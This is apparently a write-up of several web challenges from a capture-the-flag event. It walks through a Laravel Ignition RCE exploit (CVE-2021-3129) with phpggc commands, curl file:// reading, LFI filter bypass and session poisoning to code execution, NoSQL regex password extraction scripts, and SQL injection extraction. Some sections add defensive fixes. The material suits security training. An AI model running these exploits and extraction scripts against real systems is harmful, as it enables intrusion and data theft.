CTF Apocalypse

Inspector Gadget

The flag for this challenge is split into multiple parts, each stored in a different resource of the site.

The first part is on the main page itself.

Pastedimage20210419121347.png

The second part is in the HTML source of the main page (view-source).

Pastedimage20210419121244.png

The third part is in the main.css file.

Pastedimage20210419121307.png

And finally, the fourth part is in main.js.

Pastedimage20210419121331.png

FLAG: CHTB{1nsp3ction_c4n_r3ve4l_us3full_1nf0rm4tion}

DaaS

According to the description, the site's home page is a Laravel debug page (Ignition). Searching Google for a Laravel v8.35.1 exploit gives the following links: the ambionics write-up and tooling for CVE-2021-3129, RCE through Ignition's debug mode via phar deserialization.

Pastedimage20210419140313.png

https://github.com/ambionics/laravel-exploits
https://github.com/ambionics/phpggc

Running the exploit as follows gives the flag. The first phar runs ls / to find the flag's file name, the second one reads it. phpggc builds the phar with a monolog gadget chain, and laravel-ignition-rce.py delivers it to the debug endpoint.

$ php -d'phar.readonly=0' ./pp/phpggc/phpggc --phar phar -o ./exploit.phar --fast-destruct monolog/rce1 system 'ls /'
$ python3 ./laravel-ignition-rce.py http://178.62.70.150:30970/ ./exploit.phar
$ php -d'phar.readonly=0' ./pp/phpggc/phpggc --phar phar -o ./exploit.phar --fast-destruct monolog/rce1 system 'cat /flagxIfF6'
$ python3 ./laravel-ignition-rce.py http://178.62.70.150:30970/ ./exploit.phar

Pastedimage20210419140608.png

FLAG: HTB{wh3n_7h3_d3bu663r_7urn5_4641n57_7h3_d3bu6633}

CaaS

The challenge is straightforward: the service passes the supplied URL to curl, so curl's file:// scheme can be used to read local files.
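
As an added example (not part of the original writeup, and not the challenge's own code), here is the shape of the bug and of its fix in Python. The vulnerable wrapper hands the request-supplied URL to curl unchanged, so curl's file:// handler is reachable, along with dict://, gopher:// and option injection through a leading dash. The hardened wrapper allow-lists the scheme before spawning curl and also tells curl itself which protocols it may use. The function names and the argv layout are my assumptions about the service.

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def curl_argv_vulnerable(target):
    # What the challenge service effectively does: the request-supplied URL is
    # handed to curl unchanged, so every scheme curl speaks (file://, dict://,
    # gopher://, ...) is reachable, and a target starting with '-' becomes an option.
    return ["curl", "-s", target]


def is_allowed_target(target):
    parts = urlsplit(target.strip())
    if parts.scheme not in ALLOWED_SCHEMES:     # urlsplit lower-cases the scheme,
        return False                            # so FILE:// is caught as well
    if not parts.hostname:                      # file:///etc/passwd has no host
        return False
    if parts.username is not None or parts.password is not None:
        return False                            # no http://user@host confusion
    return True


def curl_argv_hardened(target):
    if not is_allowed_target(target):
        raise ValueError("refusing target: %r" % target)
    return ["curl", "-s", "--max-time", "5",
            "--proto", "=http,https",           # curl itself refuses other schemes...
            "--proto-redir", "=http,https",     # ...also after a redirect
            "--", target]                       # '--' ends option parsing


if __name__ == "__main__":
    for t in ("http://example.com/", "file:///etc/passwd", "dict://127.0.0.1:11211/stats"):
        print(t, "->", "allowed" if is_allowed_target(t) else "refused")
```

A scheme check alone does not stop SSRF to internal hosts (http://127.0.0.1/ passes); for that, resolve the host and reject private ranges, before and after redirects, which this challenge did not require.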

Pastedimage20210422180919.png

FLAG: CHTB{f1le_r3trieval_4s_a_s3rv1ce}

MiniSTRyplace

The language option appears to be vulnerable to LFI.

Pastedimage20210419123515.png

Inspecting the given code shows that ../ is replaced with an empty string. The replacement is a single pass, not a loop, so it can be defeated by input that only becomes ../ after the replacement.

Pastedimage20210419123538.png

So let's use ....//....//, which turns into ../../ once the request is processed.

Pastedimage20210419123633.png

Now let's display the flag.

Pastedimage20210419123656.png
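
Added example, not from the writeup or the challenge source: a Python model of the filter and of the bypass, next to a containment check that does not rely on stripping strings at all. The pages base directory and the join shape are assumptions about how the include path is built.

```python
import posixpath


def strip_dotdot_once(value):
    # Mirrors PHP's str_replace('../', '', $value): one pass, not repeated,
    # so "....//" collapses to "../" and the traversal survives the filter.
    return value.replace("../", "")


def vulnerable_page_path(base, lang):
    # Assumed shape of the challenge's include: prefix + filtered user input.
    return posixpath.normpath(posixpath.join(base, strip_dotdot_once(lang)))


def safe_page_path(base, lang):
    """Hardened variant: do not try to clean the input, just refuse anything
    whose normalised form escapes base. Returns the path, or None to refuse."""
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, lang))
    if candidate == base or not candidate.startswith(base + "/"):
        return None
    return candidate


if __name__ == "__main__":
    base = "/var/www/pages"
    for lang in ("en.php", "../../../flag", "....//....//....//flag", "/flag"):
        print("%-26s filtered -> %-22s hardened -> %s" % (
            lang, vulnerable_page_path(base, lang), safe_page_path(base, lang)))
```

normpath is purely lexical: in production the check should run on the realpath (symlinks resolved), or better, the language should be looked up in an allow-list of known page names rather than used as a path at all.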

FLAG: CHTB{b4d_4li3n_pr0gr4m1ng}

Wild Goose Hunt

Pastedimage20210423053258.png

Inspecting the given code reveals that the application uses MongoDB as its database.

Pastedimage20210423053328.png

Testing the NoSQL injection payloads from HackTricks (for example password[$ne]=x) responds with a successful login.

Pastedimage20210423053437.png

We can use the $regex operator to test the stored password one character at a time: a prefix that matches logs in, a prefix that does not returns "Login Failed". Doing this manually would be tedious and time consuming, so let's write a Python script to automate it and get the flag.

The script used is:

import re
import requests

URL = 'http://139.59.190.72:32397/api/login'
# Characters the flag can contain; no regex metacharacters reach the server unescaped
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}-_"

def inject(data):
    # The API answers "Login Failed" when the regex does not match the stored password
    r = requests.post(URL, data=data)
    return "Login Failed" not in r.text

secret = ""
while not secret.endswith("}"):
    for ch in ALPHABET:
        guess = secret + ch
        print("\r" + guess, end='', flush=True)
        # username[$eq]=admin&password[$regex]=^<guess> is turned into Mongo operators server-side
        data = {"username[$eq]": "admin", "password[$regex]": "^" + re.escape(guess)}
        if inject(data):
            secret = guess
            break
    else:
        break  # no character extends the prefix: stop
print("\nFLAG: " + secret)
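
Added example (mine, not the challenge's code) that reproduces offline what the HackTricks payloads and the script above rely on: an Express-style extended form parser turns username[$eq]=admin&password[$ne]=x into operator objects, and a query document built from raw request values then honours those operators. The constructed user store, the operator subset and the function names are assumptions; the fixed login shows the usual remedy of refusing non-string values.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Constructed user store standing in for the challenge's Mongo collection.
USERS = [{"username": "admin", "password": "CHTB{s1mul4t3d}"}]
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}-_"


def parse_form(body):
    """Nested keys the way Express's extended body parser (qs) builds them:
    'password[$ne]=x' becomes {'password': {'$ne': 'x'}}."""
    out = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]+)\]", key)
        if m:
            out.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            out[key] = value
    return out


def matches(field_value, cond):
    """The three MongoDB query operators this demo needs."""
    if not isinstance(cond, dict):
        return field_value == cond
    for op, arg in cond.items():
        if op == "$eq" and field_value != arg:
            return False
        if op == "$ne" and field_value == arg:
            return False
        if op == "$regex" and re.search(arg, field_value) is None:
            return False
        if op not in ("$eq", "$ne", "$regex"):
            raise ValueError("unsupported operator " + op)
    return True


def find_one(users, query):
    for user in users:
        if all(matches(user.get(field), cond) for field, cond in query.items()):
            return user
    return None


def login_vulnerable(body):
    # Whatever the parser produced goes straight into the query document.
    form = parse_form(body)
    return find_one(USERS, {"username": form.get("username"),
                            "password": form.get("password")}) is not None


def login_fixed(body):
    # Operators arrive as dicts; insisting on plain strings removes them entirely.
    form = parse_form(body)
    username, password = form.get("username"), form.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return False
    return find_one(USERS, {"username": username, "password": password}) is not None


def extract_password(login, max_len=64):
    """Character-by-character recovery through the $regex oracle, the loop the
    script above runs against the live target."""
    secret = ""
    while len(secret) < max_len:
        for ch in ALPHABET:
            guess = secret + ch
            body = urlencode({"username[$eq]": "admin",
                              "password[$regex]": "^" + re.escape(guess)})
            if login(body):
                secret = guess
                break
        else:
            break                      # no character extends the prefix
        if secret.endswith("}"):
            break
    return secret


if __name__ == "__main__":
    print("bypass  :", login_vulnerable("username[$eq]=admin&password[$ne]=x"))
    print("fixed   :", login_fixed("username[$eq]=admin&password[$ne]=x"))
    print("oracle  :", extract_password(login_vulnerable))
```

Against the fixed login the oracle never gets a hit and the extraction returns an empty string; in a real Node app the same effect comes from validating types (or a sanitiser such as mongo-sanitize) before the values reach the driver.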


FLAG: CHTB{1_th1nk_the_4l1ens_h4ve_n0t_used_m0ng0_b3f0r3}

Link: https://book.hacktricks.xyz/pentesting-web/nosql-injection

Extortion

Exploring the site reveals that the f parameter receives a PHP file name as its argument. This looks like a possible Local File Inclusion.

Pastedimage20210420075047.png

Let's inject some payloads to check whether it is vulnerable to LFI.

Pastedimage20210420075258.png

It is vulnerable: the contents of /etc/passwd are displayed. Next, we need to find the location of the flag file. Tried searching all the likely files; nothing seems interesting.

Pastedimage20210420075129.png

Now we need to turn this LFI into RCE. After inspecting the application for some time: whenever we hit /send.php with some text, it starts a PHP session, stores the text in it, and sends the session cookie back.

So let's submit PHP code as the text and see what happens.

Pastedimage20210421174902.png

Since it uses PHP sessions (PHPSESSID), let's check whether the session file is stored in the tmp directory, as /tmp/sess_<PHPSESSID>, and include it through the f parameter.

Pastedimage20210421175020.png

It displays the phpinfo page: the session file was included and the PHP stored in it was executed. Next, we inject PHP code for command execution.

Pastedimage20210421175052.png

Now, with the cmd parameter, we can display the flag.

Pastedimage20210421175119.png

FLAG: CHTB{th4ts_4_w31rd_3xt0rt10n_@#$?}

Link: https://book.hacktricks.xyz/pentesting-web/file-inclusion

Emoji Voting

Pastedimage20210421050957.png

Looking at the provided code, database.js reveals the SQL queries the app runs and how user input reaches them. So let's start by injecting SQL.

Pastedimage20210421051108.png

Pastedimage20210421051154.png

Running the above request through sqlmap reveals the flag.
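
Added example, not from the challenge or the writeup, of the kind of injection sqlmap automated here, run offline against SQLite: a sort expression concatenated into ORDER BY (an assumed query shape) gives a boolean oracle through the row order, which is enough to pull a secret out of another table one character at a time. An allow-list is the fix, because ORDER BY columns cannot be bound as query parameters. Table names and data are constructed.

```python
import sqlite3

ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}_-"
ALLOWED_ORDER = {"id", "name", "count"}


def make_db():
    # Constructed data: the votes table plus a table holding the secret.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE emojis (id INTEGER PRIMARY KEY, name TEXT, count INTEGER);
        INSERT INTO emojis VALUES (1, 'grin', 5), (2, 'fire', 9), (3, 'pizza', 1);
        CREATE TABLE secrets (flag TEXT);
        INSERT INTO secrets VALUES ('CHTB{demo_fl4g}');
    """)
    return con


def list_vulnerable(con, order):
    # Assumed query shape: the sort expression is concatenated into the SQL.
    # Only the row order is attacker-visible, hence a boolean-based oracle.
    return [row[0] for row in con.execute("SELECT name FROM emojis ORDER BY " + order)]


def order_is_allowed(order):
    return order in ALLOWED_ORDER


def list_fixed(con, order):
    # Placeholders cannot name a column, so the sort key is allow-listed instead.
    if not order_is_allowed(order):
        raise ValueError("bad sort column")
    return [row[0] for row in con.execute("SELECT name FROM emojis ORDER BY " + order)]


def oracle(con, condition):
    # True condition: sorted by id ascending, 'grin' first. False: reversed.
    payload = "(CASE WHEN (%s) THEN id ELSE -id END)" % condition
    return list_vulnerable(con, payload)[0] == "grin"


def extract_flag(con, max_len=64):
    found = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            # ALPHABET holds no quotes, so the literal needs no escaping here.
            cond = "substr((SELECT flag FROM secrets LIMIT 1), %d, 1) = '%s'" % (pos, ch)
            if oracle(con, cond):
                found += ch
                break
        else:
            break                       # no candidate matched: end of string
        if found.endswith("}"):
            break
    return found


if __name__ == "__main__":
    db = make_db()
    print("sorted by count :", list_fixed(db, "count"))
    print("extracted       :", extract_flag(db))
```

SQLite's default BINARY collation makes the per-character comparison exact; in MySQL with a case-insensitive collation the same test would need BINARY or a hex comparison, which is one reason to let sqlmap pick the technique.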

FLAG: CHTB{order_me_this_juicy_info}